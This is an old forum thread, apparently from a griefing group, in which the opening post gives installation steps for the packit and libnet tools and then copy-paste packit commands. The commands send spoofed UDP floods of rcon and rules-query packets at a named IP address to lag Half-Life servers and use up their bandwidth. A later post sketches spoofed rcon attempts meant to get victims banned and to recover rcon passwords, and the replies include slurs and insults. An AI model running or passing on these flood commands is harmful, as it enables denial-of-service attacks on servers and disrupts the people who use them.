Posted August 21, 200420 yr You need to have linux to use this. You dont have to really understand much to do this although it helps if you do. This is to help the noobs/script kiddies and any one else who wants to reape havok onto servers and cause problems 1. Fuck valve 2. Fuck sierra 3. Fuck steam Instalation process #1 download http://www.packetfactory.net/projects/packit/downloads/packit-1.0.tgz #2 download http://www.packetfactory.net/libnet/dist/libnet.tar.gz #3 under root where both of these files are located copy and paste this into your console then hit enter gunzip libnet.tar.gz&&tar -xf libnet.tar&&cd libnet&&./configure&&make install&&cd ..&&gunzip packit-1.0.tgz&&tar -xf packit-1.0.tar&&cd packit-1.0&&./configure&&make install After this has been completed; from any where you should be able to run packit. So now we can dd0s people for example to dd0s a half-life server with rcon attempts you would use this command (please realize that this is in hex for ease of use) I will explain how to change this function after i give you the command. Its easy to copy and paste this also -c 0 makes this an infinte flood until ctrl+c is hit. -w .08 makes the rate at which the flood is sent to 80 milliseconds -b 5 bursts 5 packets per every 80 mil. interval -p '0x ff ff ff ff 72 63 6f 6e 00' is the pay load IE the rcon command. also the 0x must be infront of this to specify it is hex other wise it converts the text you type to hex -sR defines the source to be random -d is the destination server.... my favorite is included there dd0s them ahhahahahah -D defines the destination port... the source port by default is random unless defined... i have left alot of other things out... but this should work all you need to do is chance source ip source port and maybey rate If you need to know more type man packit //This is for trying to lag the cpu of the server using bad rcon attempts. packit -t UDP -c 0 -w .08 -b 5 -i eth0 -p '0x ff ff ff ff 72 63 6f 6e 00' -sR -d 69.93.78.194 -o 0 -D 27017 //This is for either trying to use up some ones bandwith with out them knowing or trying to use up all of thier upload.... very funny as it is undetectable this essentialy in hex requests the server rules; for beta cs... you may want to use eathereal to sniff what the command for players is and dd0s a 64 player server as there would be alot of players and this would cause them to be fucked... packit -t UDP -c 0 -w .08 -b 5 -i eth0 -p '0x ff ff ff ff 72 75 6c 65 63 00' -sR -d 69.93.78.194 -o 0 -D 27017 Good luck and good bye for awhile.... Also, g0d u rarely anwser your AIM's.... i think you need to get a private ICQ ur the only cool myg0t... this is dedicated to you.
August 21, 200420 yr Other additions; if you know some ones ip address; you can spam 1000 rcon attempts from them and they are banned. Unfourteantely i am to lazy to figure out how to make a raw socket in c++ but if one were to do this; you could steal a server rcon by attempting rcons from other ips with the command to change the host name... then you would have the program look to see if the server name has been changed if so; it would go back thru the interval between which it last checked and try to change host name and check for every one... once it figured it out; it would stop and display the rcon password... rember this is all from spoofing the source... Valve games are in for a world of shit
August 22, 200420 yr sounds like someone needs to read beej's guide to network programming before he passes himself off as a 1337 h4x0r :)
August 22, 200420 yr ch0p said: sounds like someone needs to read beej's guide to network programming before he passes himself off as a 1337 h4x0r :) STFU bitch; that was quick and dirty and it works fag... tkae back your words or i will smash you into the ground Also; this is for the people who just want to use it and not screw around, it functions perfectly; i left alot of i's undotted because they dont need to know about them again, man will help with explaing this finding a raw socket text will make you more aware of what is really being done for you.
January 5, 200520 yr thats a cool script but the hard part is using that fuckbomb linux , i fucking *hate* linux.
January 9, 200520 yr Mordecai said: thats a cool script but the hard part is using that fuckbomb linux , i fucking *hate* linux. Then you'll be happy to learn there are ways to packet someone on Windows.